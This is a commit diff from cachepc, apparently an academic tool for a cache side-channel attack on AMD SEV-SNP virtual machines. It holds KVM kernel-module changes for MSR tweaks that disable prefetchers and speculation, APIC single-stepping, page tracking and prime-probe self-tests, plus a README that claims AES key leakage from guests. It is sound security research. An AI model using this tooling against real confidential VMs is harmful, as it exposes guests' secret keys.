cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc

commit 3f43dd1778c7ac8c09c3dc5612ac902c3a7ad84d
parent f2ea010b8180b4160d85c92e312971d0cd8a34d4
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 19 Jan 2023 01:48:16 +0100

Many fixes, more precise single-stepping and more robust self-tests

Diffstat:
M Makefile              |   1 +
M README                |  29 ++++++++++++++++++++++-------
M cachepc/cachepc.c     |  57 +++++++++++++++++++++++++++++++++++++--------------------
M cachepc/cachepc.h     |  10 +++++++---
M cachepc/event.c       |   2 ++
M cachepc/kvm.c         | 525 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-----------------------------------------------------------------------------------------------------------
M cachepc/uapi.h        |   4 ++--
M test/kvm-step.c       |  44 +++++++++++++++++++++++++++++++++-----------
M test/kvm-step_guest.S |  18 +++++++++++-------
9 files changed, 323 insertions(+), 367 deletions(-)
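
The most visible interface change in this commit: the blocking
KVM_CPC_VM_PAUSE / KVM_CPC_VM_RESUME ioctl pair is gone, replaced by an
asynchronous KVM_CPC_VM_REQ_PAUSE that is confirmed and later released
through the existing poll/ack event interface. A minimal userspace sketch
of the new handshake, distilled from the test/kvm-step.c hunks below (the
helper name is hypothetical and the include path assumed; error handling
follows the test's err() style):

	/* sketch: request a pause, wait for the pause event, ack to resume */
	#include <sys/ioctl.h>
	#include <errno.h>
	#include <err.h>

	#include "cachepc/uapi.h" /* assumed include path */

	static void
	pause_vm_and_wait(int kvm_dev) /* hypothetical helper */
	{
		struct cpc_event event;
		int ret;

		/* request a pause; the pause is reported asynchronously
		 * as a CPC_EVENT_PAUSE event */
		ret = ioctl(kvm_dev, KVM_CPC_VM_REQ_PAUSE);
		if (ret) err(1, "ioctl KVM_CPC_VM_REQ_PAUSE");

		/* drain unrelated events until the pause event arrives */
		while (1) {
			ret = ioctl(kvm_dev, KVM_CPC_POLL_EVENT, &event);
			if (ret && errno == EAGAIN) continue;
			if (ret) err(1, "ioctl KVM_CPC_POLL_EVENT");
			if (event.type == CPC_EVENT_PAUSE) break;
			ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
			if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
		}

		/* ... inspect guest state while the vcpu is parked ... */

		/* acking the pause event resumes the guest; the
		 * cachepc/event.c hunk below clears cachepc_pause_vm
		 * exactly there */
		ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
		if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
	}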

diff --git a/Makefile b/Makefile
@@ -22,6 +22,7 @@ all: build $(BINS)
 clean:
 	$(MAKE) -C $(LINUX) clean M=arch/x86/kvm
 	$(MAKE) -C $(LINUX) clean M=crypto
+	rm -f cachepc/*.o
 	rm -f $(BINS)
 
 $(LINUX)/arch/x86/kvm/cachepc:
diff --git a/README b/README
@@ -6,6 +6,10 @@ attack dubbed PRIME+COUNT that we demonstrate can be used to
 circumvent AMD's latest secure virtualization solution SEV-SNP
 to access sensitive guest information.
 
+
+tests
+-----
+
 Several test-cases were used to verify parts of the exploit chain separately:
 
 test/eviction:
@@ -43,9 +47,14 @@ test/qemu-poc:
 	Demonstrate that AES encryption keys can be leaked from an
 	unmodified qemu-based linux guest.
 
-Testing was done on a bare-metal AMD EPYC 72F3 (Family 0x19, Model 0x01)
-cpu and Supermicro H12SSL-i V1.01 motherboard. The following BIOS settings
-differ from the defaults:
+
+setup
+-----
+
+Testing was done on a Supermicro H12SSL-i V1.01 motherboard and AMD EPYC 72F3
+(Family 0x19, Model 0x01) cpu.
+
+The following BIOS settings differ from the defaults:
 
 Advanced > CPU Configuration > Local APIC Mode = xAPIC
 Advanced > CPU Configuration > L1 Stream HW Prefetcher = Disabled
@@ -57,11 +66,17 @@ Advanced > CPU Configuration > SEV ASID Space Limit = 110
 Advanced > CPU Configuration > SNP Memory (RMP Table) Coverage = Enabled
 Advanced > North Bridge Configuration > SEV-SNP Support = Enabled
 Advanced > North Bridge Configuration > Memory Configuration > TSME = Disabled
-Advanced > PCI Devices Common Settings > Memory Configuration > TSME = Disabled
+
+The following kernel parameters were used:
+
+kvm_amd.sev=1 kvm_amd.sev_es=1 nokaslr debug systemd.log_level=info
+isolcpus=2,10,3,11 nohz_full=2,10,3,11 rcu_nocbs=2,10,3,11 nmi_watchdog=0
+transparent_hugepage=never apic lapic panic=-1
 
 To successfully build and load the kvm.ko and kvm-amd.ko modules, ensure
 that a host kernel debian package was built using `make host`.
 
-Note: because of bad decisions made in regards to version control,
-the checked out commit of the modified kernel (previously the
-kernel patch file) might be incorrect for older revisions.
+Because of bad decisions made in regards to version control, the checked
+out commit of the modified kernel (previously the kernel patch file) might
+be incorrect for older revisions.
+
diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c
@@ -1,6 +1,8 @@
 #include "cachepc.h"
 #include "uapi.h"
 
+#include "../../include/asm/processor.h"
+
 #include <linux/kernel.h>
 #include <linux/types.h>
 #include <linux/slab.h>
@@ -28,29 +30,28 @@ static bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len);
 bool
 cachepc_verify_topology(void)
 {
+	uint32_t assoc, linesize;
+	uint32_t size, sets;
 	uint32_t val;
-	uint32_t assoc;
-	uint32_t linesize;
-	uint32_t size;
-	uint32_t sets;
 
 	if (PAGE_SIZE != L1_SETS * L1_LINESIZE)
 		CPC_ERR("System pagesize does not guarentee "
 			"virtual memory access will hit corresponding "
-			"physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE\n");
+			"physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE");
+
 	/* REF: https://developer.amd.com/resources/developer-guides-manuals
 	 * (PPR 17H 31H, P.81) */
-	asm volatile ("cpuid" : "=c"(val) : "a"(0x80000005));
+	val = native_cpuid_ecx(0x80000005);
 	size = ((val >> 24) & 0xFF) * 1024;
 	assoc = (val >> 16) & 0xFF;
 	linesize = val & 0xFF;
 	sets = size / (linesize * assoc);
 	if (size != L1_SIZE || assoc != L1_ASSOC
 			|| linesize != L1_LINESIZE || sets != L1_SETS) {
-		CPC_ERR("L1 topology is invalid!\n");
-		CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
+		CPC_ERR("L1 topology is invalid!\n");
+		CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
 			L1_SIZE, size);
 		CPC_ERR("L1_ASSOC (expected) %u vs. (real) %u\n",
 			L1_ASSOC, assoc);
@@ -61,7 +62,7 @@ cachepc_verify_topology(void)
 		return true;
 	}
 
-	asm volatile ("cpuid" : "=c"(val) : "a"(0x80000006));
+	val = native_cpuid_ecx(0x80000006);
 	size = ((val >> 16) & 0xFFFF) * 1024;
 	assoc = (val >> 12) & 0xF;
 	linesize = val & 0xFF;
@@ -117,18 +118,31 @@ cachepc_verify_topology(void)
 }
 
 void
+cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits)
+{
+	uint64_t val, newval;
+	uint32_t lo, hi;
+
+	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
+	val = (uint64_t) lo | ((uint64_t) hi << 32);
+	val &= ~clear_bits;
+	val |= set_bits;
+	asm volatile ("wrmsr" : : "c"(addr), "a"(val), "d"(0x00));
+
+	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
+	newval = (uint64_t) lo | ((uint64_t) hi << 32);
+	if (val != newval)
+		CPC_ERR("Write MSR failed at addr %08llX\n", addr);
+}
+
+void
 cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	uint8_t host_guest, uint8_t kernel_user)
 {
-	uint64_t event;
 	uint64_t reg_addr;
+	uint64_t event;
 
-	/* REF: https://developer.amd.com/resources/developer-guides-manuals
-	 * (PPR 19H 01H, P.166)
-	 *
-	 * performance event selection via 0xC001_020X with X = (0..A)[::2]
-	 * performance event reading viea 0XC001_020X with X = (1..B)[::2]
-	 */
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.166 */
 
 	WARN_ON(index >= 6);
 	if (index >= 6) return;
@@ -138,7 +152,8 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	event |= (1ULL << 22); /* enable performance counter */
 	event |= ((kernel_user & 0b11) * 1ULL) << 16;
 	event |= ((host_guest & 0b11) * 1ULL) << 40;
-	printk(KERN_WARNING "CachePC: Initialized %i. PMC %02X:%02X (%016llx)\n",
+
+	printk(KERN_WARNING "CachePC: Initializing %i. PMC %02X:%02X (%016llx)\n",
 		index, event_no, event_mask, event);
 	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
 }
@@ -154,7 +169,8 @@ cachepc_reset_pmc(uint8_t index)
 
 	reg_addr = 0xc0010201 + index * 2;
 	value = 0;
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value));
+
+	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value), "d"(0x00));
 }
 
 cache_ctx *
@@ -247,6 +263,7 @@ cachepc_save_msrmts(cacheline *head)
 			cachepc_msrmts[curr_cl->cache_set] = curr_cl->count;
 		}
 
+		curr_cl->count = 0;
 		curr_cl = curr_cl->prev;
 	} while (curr_cl != head);
@@ -289,8 +306,8 @@ cachepc_update_baseline(void)
 void __attribute__((optimize(1))) // prevent instruction reordering
 cachepc_prime_vcall(uintptr_t ret, cacheline *cl)
 {
-	if (cachepc_single_step)
-		cachepc_apic_oneshot(cachepc_apic_timer);
+	if (cachepc_singlestep)
+		cachepc_apic_oneshot(cachepc_apic_timer / CPC_APIC_TIMER_SOFTDIV);
 	cachepc_prime(cl);
 	asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax");
 }
diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h
@@ -42,6 +42,8 @@
 #define CPC_WARN(...) do { pr_warn("CachePC: " __VA_ARGS__); } while (0)
 #define CPC_ERR(...) do { pr_err("CachePC: " __VA_ARGS__); } while (0)
 
+#define CPC_APIC_TIMER_SOFTDIV 3
+
 typedef struct cacheline cacheline;
 typedef struct cache_ctx cache_ctx;
@@ -83,6 +85,7 @@ static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8);
 
 bool cachepc_verify_topology(void);
 
+void cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits);
 void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	uint8_t host_guest, uint8_t kernel_user);
 void cachepc_reset_pmc(uint8_t index);
@@ -129,10 +132,11 @@ extern bool cachepc_baseline_active;
 
 extern bool cachepc_pause_vm;
 
-extern bool cachepc_single_step;
-extern uint32_t cachepc_track_mode;
+extern bool cachepc_singlestep;
+extern bool cachepc_singlestep_reset;
 extern uint32_t cachepc_apic_timer;
 
+extern uint32_t cachepc_track_mode;
 extern uint64_t cachepc_track_start_gfn;
 extern uint64_t cachepc_track_end_gfn;
@@ -166,7 +170,7 @@ cachepc_prime(cacheline *head)
 	cachepc_mfence();
 	cachepc_cpuid();
-	
+
 	curr_cl = head;
 	do {
 		prev_cl = curr_cl;
diff --git a/cachepc/event.c b/cachepc/event.c
@@ -181,6 +181,8 @@ cachepc_handle_ack_event_ioctl(uint64_t eventid)
 
 	write_lock(&cachepc_event_lock);
 	if (!eventid || eventid == cachepc_last_event_sent) {
+		if (cachepc_event.type == CPC_EVENT_PAUSE)
+			cachepc_pause_vm = false;
 		err = 0;
 		cachepc_last_event_acked = cachepc_last_event_sent;
 	} else {
diff --git a/cachepc/kvm.c b/cachepc/kvm.c
@@ -16,6 +16,8 @@
 #include <linux/types.h>
 #include <asm/uaccess.h>
 
+#define TEST_REPEAT_MAX 200
+
 bool cachepc_debug = false;
 EXPORT_SYMBOL(cachepc_debug);
@@ -44,15 +46,17 @@ EXPORT_SYMBOL(cachepc_rip);
 EXPORT_SYMBOL(cachepc_rip_prev);
 EXPORT_SYMBOL(cachepc_rip_prev_set);
 
-bool cachepc_single_step = false;
-uint32_t cachepc_track_mode = false;
+bool cachepc_singlestep = false;
+bool cachepc_singlestep_reset = false;
 uint32_t cachepc_apic_timer = 0;
-EXPORT_SYMBOL(cachepc_single_step);
-EXPORT_SYMBOL(cachepc_track_mode);
+EXPORT_SYMBOL(cachepc_singlestep);
+EXPORT_SYMBOL(cachepc_singlestep_reset);
 EXPORT_SYMBOL(cachepc_apic_timer);
 
+uint32_t cachepc_track_mode = false;
 uint64_t cachepc_track_start_gfn = 0;
 uint64_t cachepc_track_end_gfn = 0;
+EXPORT_SYMBOL(cachepc_track_mode);
 EXPORT_SYMBOL(cachepc_track_start_gfn);
 EXPORT_SYMBOL(cachepc_track_end_gfn);
@@ -91,9 +95,9 @@ EXPORT_SYMBOL(cachepc_event_avail);
 bool cachepc_events_init;
 EXPORT_SYMBOL(cachepc_events_init);
 
-static void cachepc_kvm_prime_probe_test(void *p);
-static void cachepc_kvm_stream_hwpf_test(void *p);
-static void cachepc_kvm_single_eviction_test(void *p);
+static noinline void cachepc_kvm_prime_probe_test(void);
+static noinline void cachepc_kvm_stream_hwpf_test(void);
+static noinline void cachepc_kvm_single_eviction_test(void *p);
 
 static void cachepc_kvm_system_setup(void);
@@ -109,104 +113,96 @@ static int cachepc_kvm_calc_baseline_ioctl(void __user *arg_user);
 static int cachepc_kvm_read_baseline_ioctl(void __user *arg_user);
 static int cachepc_kvm_apply_baseline_ioctl(void __user *arg_user);
 
-//static int cachepc_kvm_single_step_ioctl(void __user *arg_user);
-
 static int cachepc_kvm_vmsa_read_ioctl(void __user *arg_user);
 static int cachepc_kvm_svme_read_ioctl(void __user *arg_user);
 
+static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user);
 static int cachepc_kvm_track_mode_ioctl(void __user *arg_user);
 // static int cachepc_kvm_track_page_ioctl(void __user *arg_user);
-// static int cachepc_kvm_track_all_ioctl(void __user *arg_user);
-// static int cachepc_kvm_untrack_all_ioctl(void __user *arg_user);
-static int cachepc_kvm_reset_tracking_ioctl(void __user *arg_user);
 // static int cachepc_kvm_track_range_start_ioctl(void __user *arg_user);
 // static int cachepc_kvm_track_range_end_ioctl(void __user *arg_user);
 // static int cachepc_kvm_track_exec_cur_ioctl(void __user *arg_user);
 
-static int cachepc_kvm_vm_pause_ioctl(void __user *arg_user);
-static int cachepc_kvm_vm_resume_ioctl(void __user *arg_user);
-
 static int cachepc_kvm_poll_event_ioctl(void __user *arg_user);
 static int cachepc_kvm_ack_event_ioctl(void __user *arg_user);
 
+static int cachepc_kvm_req_pause_ioctl(void __user *arg_user);
+
 void
-cachepc_kvm_prime_probe_test(void *p)
+cachepc_kvm_prime_probe_test(void)
 {
 	cacheline *lines;
 	cacheline *cl, *head;
 	uint32_t count;
-	uint32_t *arg;
-	int i, max;
-
-	arg = p;
+	int n;
 
 	/* l2 data cache hit & miss */
 	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
 
 	lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
 
-	max = cachepc_ctx->nr_of_cachelines;
-
-	cachepc_cpuid();
-	cachepc_mfence();
+	// wbinvd();
 
-	for (i = 0; i < max; i++)
-		asm volatile ("mov (%0), %%rbx" : : "r"(lines + i) : "rbx");
+	for (n = 0; n < TEST_REPEAT_MAX; n++) {
+		head = cachepc_prime(cachepc_ds);
+		cachepc_probe(head);
 
-	head = cachepc_prime(cachepc_ds);
-	cachepc_probe(head);
+		count = 0;
+		cl = head = cachepc_ds;
+		do {
+			if (CL_IS_FIRST(cl->flags))
+				count += cl->count;
+			cl = cl->next;
+		} while (cl != head);
 
-	count = 0;
-	cl = head = cachepc_ds;
-	do {
-		count += cl->count;
-		cl = cl->next;
-	} while (cl != head);
-
-	CPC_WARN("Prime-probe test done (%u vs. %u => %s)\n",
-		count, 0, (count == 0) ? "passed" : "failed");
+		if (count != 0) {
+			CPC_ERR("Prime-probe %i. test failed (%u vs. %u)\n",
+				n, count, 0);
+			break;
+		}
+	}
 
-	if (arg) *arg = (count == 0);
+	if (n == TEST_REPEAT_MAX)
+		CPC_WARN("Prime-probe test ok (%u vs. %u)\n", count, 0);
 
 	kfree(lines);
 }
 
 void
-cachepc_kvm_stream_hwpf_test(void *p)
+cachepc_kvm_stream_hwpf_test(void)
 {
 	cacheline *lines;
+	const uint32_t max = 4;
 	uint32_t count;
-	uint32_t *arg;
-	uint32_t max;
-
-	arg = p;
+	int n;
 
 	/* l2 data cache hit & miss */
 	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
 
	lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
 
-	max = 10;
+	// wbinvd();
+
 	count = 0;
-	cachepc_prime(cachepc_ds);
-
-	count -= cachepc_read_pmc(CPC_L1MISS_PMC);
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 4) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 5) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 6) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 7) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 8) : "rbx");
-	asm volatile ("mov (%0), %%rbx" : : "r"(lines + 9) : "rbx");
-	count += cachepc_read_pmc(CPC_L1MISS_PMC);
-
-	CPC_WARN("HWPF test done (%u vs. %u => %s)\n",
-		count, max, count == max ? "passed" : "failed");
-
-	if (arg) *arg = (count == max);
+	for (n = 0; n < TEST_REPEAT_MAX; n++) {
+		cachepc_prime(cachepc_ds);
+
+		count -= cachepc_read_pmc(CPC_L1MISS_PMC);
+		asm volatile ("mov (%0), %%rbx" : : "r"(lines + 0) : "rbx");
+		asm volatile ("mov (%0), %%rbx" : : "r"(lines + 1) : "rbx");
+		asm volatile ("mov (%0), %%rbx" : : "r"(lines + 2) : "rbx");
+		asm volatile ("mov (%0), %%rbx" : : "r"(lines + 3) : "rbx");
+		count += cachepc_read_pmc(CPC_L1MISS_PMC);
+
+		if (count != max) {
+			CPC_ERR("HWPF %i. test failed (%u vs. %u)\n",
+				n, count, max);
+			break;
+		}
+	}
+
+	if (n == TEST_REPEAT_MAX)
+		CPC_INFO("HWPF test ok (%u vs. %u)\n", count, max);
 
 	kfree(lines);
 }
@@ -218,7 +214,7 @@ cachepc_kvm_single_eviction_test(void *p)
 	cacheline *ptr;
 	uint32_t target;
 	uint32_t *arg;
-	int count;
+	int n, count;
 
 	arg = p;
@@ -231,27 +227,38 @@ cachepc_kvm_single_eviction_test(void *p)
 
 	ptr = cachepc_prepare_victim(cachepc_ctx, target);
 
-	head = cachepc_prime(cachepc_ds);
-	cachepc_victim(ptr);
-	cachepc_probe(head);
-
-	count = 0;
-	evicted = NULL;
-	cl = head = cachepc_ds;
-	do {
-		if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
-			evicted = cl;
-			count += cl->count;
+	// wbinvd();
+
+	for (n = 0; n < TEST_REPEAT_MAX; n++) {
+		head = cachepc_prime(cachepc_ds);
+		cachepc_victim(ptr);
+		cachepc_probe(head);
+
+		count = 0;
+		evicted = NULL;
+		cl = head = cachepc_ds;
+		do {
+			if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
+				evicted = cl;
+				count += cl->count;
+			}
+			cl = cl->next;
+		} while (cl != head);
+
+		if (count != 1 || evicted->cache_set != target) {
+			CPC_ERR("Single eviction %i. test failed (%u vs %u)\n",
+				n, count, 1);
+			if (arg) *arg = count;
+			break;
 		}
-		cl = cl->next;
-	} while (cl != head);
 
-	CPC_WARN("Single eviction test done (%u vs %u => %s)\n",
-		count, 1, (count == 1 && evicted->cache_set == target)
-		? "passed" : "failed");
-	cachepc_save_msrmts(head);
+		cachepc_save_msrmts(head);
+	}
 
-	if (arg) *arg = count;
+	if (n == TEST_REPEAT_MAX) {
+		CPC_INFO("Single eviction test ok (%u vs %u)\n", count, 1);
+		if (arg) *arg = count;
+	}
 
 	cachepc_release_victim(cachepc_ctx, ptr);
 }
@@ -259,69 +266,41 @@ cachepc_kvm_single_eviction_test(void *p)
 void
 cachepc_kvm_system_setup(void)
 {
-	uint64_t reg_addr, val;
-	uint32_t lo, hi;
-
 	/* NOTE: since most of these MSRs are poorly documented and some
 	 * guessing work was involved, it is likely that one or more of
 	 * these operations are not needed */
 
-	/* disable streaming store */
-	reg_addr = 0xc0011020;
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
-	val |= 1 << 13;
-	CPC_WARN("Disabling streaming store (MSR %08llX: %016llX)\n",
-		reg_addr, val);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
-	/* disable speculative data cache tlb reloads */
-	reg_addr = 0xc0011022;
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
-	val |= 1 << 4;
-	CPC_WARN("Disabling speculative reloads (MSR %08llX: %016llX)\n",
-		reg_addr, val);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
-	/* disable data cache hw prefetchers */
-	reg_addr = 0xc0011022;
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
-	val |= 1 << 13;
-	CPC_WARN("Disabling DATA HWPF (MSR %08llX: %016llX)\n",
-		reg_addr, val);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
+	// /* disable streaming store */
+	// cachepc_write_msr(0xc0011020, 0, 1ULL << 13);
+
+	// /* disable speculative data cache tlb reloads */
+	// cachepc_write_msr(0xc0011022, 0, 1ULL << 4);
+
+	// /* disable data cache hw prefetchers */
+	// cachepc_write_msr(0xc0011022, 0, 1ULL << 13);
 
 	/* disable inst cache hw prefetchers */
-	reg_addr = 0xc0011021;
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
-	val |= 1 << 13;
-	CPC_WARN("Disabling INST HWPF (MSR %08llX: %016llX)\n",
-		reg_addr, val);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
-	/* REF: https://arxiv.org/pdf/2204.03290.pdf
-	 * Paper "Memory Performance of AMD EPYC Rome and Intel Cascade
-	 * Lake SP Server Processors"
-	 * disable L1 & L2 prefetchers */
-
-	reg_addr = 0xc0011022;
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
-	val |= 1 << 16;
-	printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n",
-		reg_addr, val);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
-
-	reg_addr = 0xc001102b;
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(reg_addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
-	val &= ~1ULL;
-	printk("CachePC: Disabling L1 & L2 prefetchers (MSR %08llX: %016llX)\n",
-		reg_addr, val);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(val), "d"(0x00));
+	cachepc_write_msr(0xc0011021, 0, 1ULL << 13);
+
+	/* REF: https://arxiv.org/pdf/2204.03290.pdf */
+	/* l1 and l2 prefetchers */
+	cachepc_write_msr(0xc0011022, 0, 1ULL << 16);
+	cachepc_write_msr(0xc001102b, 1ULL << 0, 0);
+
+	/* REF: https://community.amd.com/t5/archives-discussions/modifying-msr-to-disable-the-prefetcher/td-p/143443 */
+	cachepc_write_msr(0xc001102b, 0, 1ULL << 18);
+
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.168
+	 * disable L1 and L2 prefetcher */
+	cachepc_write_msr(0xC0000108, 0, 0b00101111);
+
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.111
+	 * disable speculation */
+	cachepc_write_msr(0x00000048, 0, 0b10000111);
+
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.175
+	 * disable core performance boost */
+	cachepc_write_msr(0xC0010015, 0, 1ULL << 25);
 }
 
 int
@@ -351,6 +330,11 @@ cachepc_kvm_reset_ioctl(void __user *arg_user)
 	cachepc_kvm_reset_tracking_ioctl(NULL);
 	cachepc_kvm_reset_baseline_ioctl(NULL);
 
+	cachepc_singlestep = false;
+	cachepc_singlestep_reset = false;
+	cachepc_apic_timer = 0;
+	cachepc_rip_prev_set = false;
+
 	return 0;
 }
@@ -455,74 +439,6 @@ cachepc_kvm_apply_baseline_ioctl(void __user *arg_user)
 }
 
 int
-cachepc_kvm_single_step_ioctl(void __user *arg_user)
-{
-	cachepc_single_step = true;
-
-	return 0;
-}
-
-int
-cachepc_kvm_track_mode_ioctl(void __user *arg_user)
-{
-	struct kvm_vcpu *vcpu;
-	uint32_t mode;
-
-	if (!arg_user) return -EINVAL;
-
-	if (copy_from_user(&mode, arg_user, sizeof(mode)))
-		return -EFAULT;
-
-	cachepc_single_step = false;
-	cachepc_track_mode = mode;
-
-	BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array));
-	vcpu = xa_load(&main_vm->vcpu_array, 0);
-
-	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC);
-	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
-	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
-
-	switch (mode) {
-	case CPC_TRACK_FULL:
-		cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
-		mode = CPC_TRACK_FULL;
-		break;
-	case CPC_TRACK_EXEC:
-		cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC);
-		mode = CPC_TRACK_EXEC;
-		break;
-	default:
-		mode = CPC_TRACK_NONE;
-		break;
-	}
-
-	return 0;
-}
-
-int
-cachepc_kvm_track_page_ioctl(void __user *arg_user)
-{
-	struct cpc_track_config cfg;
-	struct kvm_vcpu *vcpu;
-
-	if (!main_vm || !arg_user) return -EINVAL;
-
-	if (copy_from_user(&cfg, arg_user, sizeof(cfg)))
-		return -EFAULT;
-
-	if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX)
-		return -EINVAL;
-
-	BUG_ON(xa_empty(&main_vm->vcpu_array));
-	vcpu = xa_load(&main_vm->vcpu_array, 0);
-	if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode))
-		return -EFAULT;
-
-	return 0;
-}
-
-int
 cachepc_kvm_vmsa_read_ioctl(void __user *arg_user)
 {
 	struct kvm_vcpu *vcpu;
@@ -563,50 +479,6 @@ cachepc_kvm_svme_read_ioctl(void __user *arg_user)
 	return 0;
 }
 
-// int
-// cachepc_kvm_track_all_ioctl(void __user *arg_user)
-// {
-// 	struct kvm_vcpu *vcpu;
-// 	uint32_t mode;
-// 
-// 	if (!main_vm || !arg_user) return -EINVAL;
-// 
-// 	if (copy_from_user(&mode, arg_user, sizeof(mode)))
-// 		return -EFAULT;
-// 
-// 	if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX)
-// 		return -EINVAL;
-// 
-// 	BUG_ON(xa_empty(&main_vm->vcpu_array));
-// 	vcpu = xa_load(&main_vm->vcpu_array, 0);
-// 	if (!cachepc_track_all(vcpu, mode))
-// 		return -EFAULT;
-// 
-// 	return 0;
-// }
-// 
-// int
-// cachepc_kvm_untrack_all_ioctl(void __user *arg_user)
-// {
-// 	struct kvm_vcpu *vcpu;
-// 	uint32_t mode;
-// 
-// 	if (!main_vm || !arg_user) return -EINVAL;
-// 
-// 	if (copy_from_user(&mode, arg_user, sizeof(mode)))
-// 		return -EFAULT;
-// 
-// 	if (mode < 0 || mode >= KVM_PAGE_TRACK_MAX)
-// 		return -EINVAL;
-// 
-// 	BUG_ON(xa_empty(&main_vm->vcpu_array));
-// 	vcpu = xa_load(&main_vm->vcpu_array, 0);
-// 	if (!cachepc_untrack_all(vcpu, mode))
-// 		return -EFAULT;
-// 
-// 	return 0;
-// }
-
 int
 cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
 {
@@ -619,15 +491,16 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
 	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
 	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
 
-	cachepc_track_mode = CPC_TRACK_NONE;
-
 	cachepc_inst_fault_gfn = 0;
 	cachepc_inst_fault_err = 0;
 
 	cachepc_track_start_gfn = 0;
 	cachepc_track_end_gfn = 0;
 
-	cachepc_single_step = false;
+	cachepc_singlestep = false;
+	cachepc_singlestep_reset = false;
+
+	cachepc_track_mode = CPC_TRACK_NONE;
 
 	list_for_each_entry_safe(fault, next, &cachepc_faults, list) {
 		list_del(&fault->list);
@@ -638,31 +511,73 @@ cachepc_kvm_reset_tracking_ioctl(void __user *arg_user)
 }
 
 int
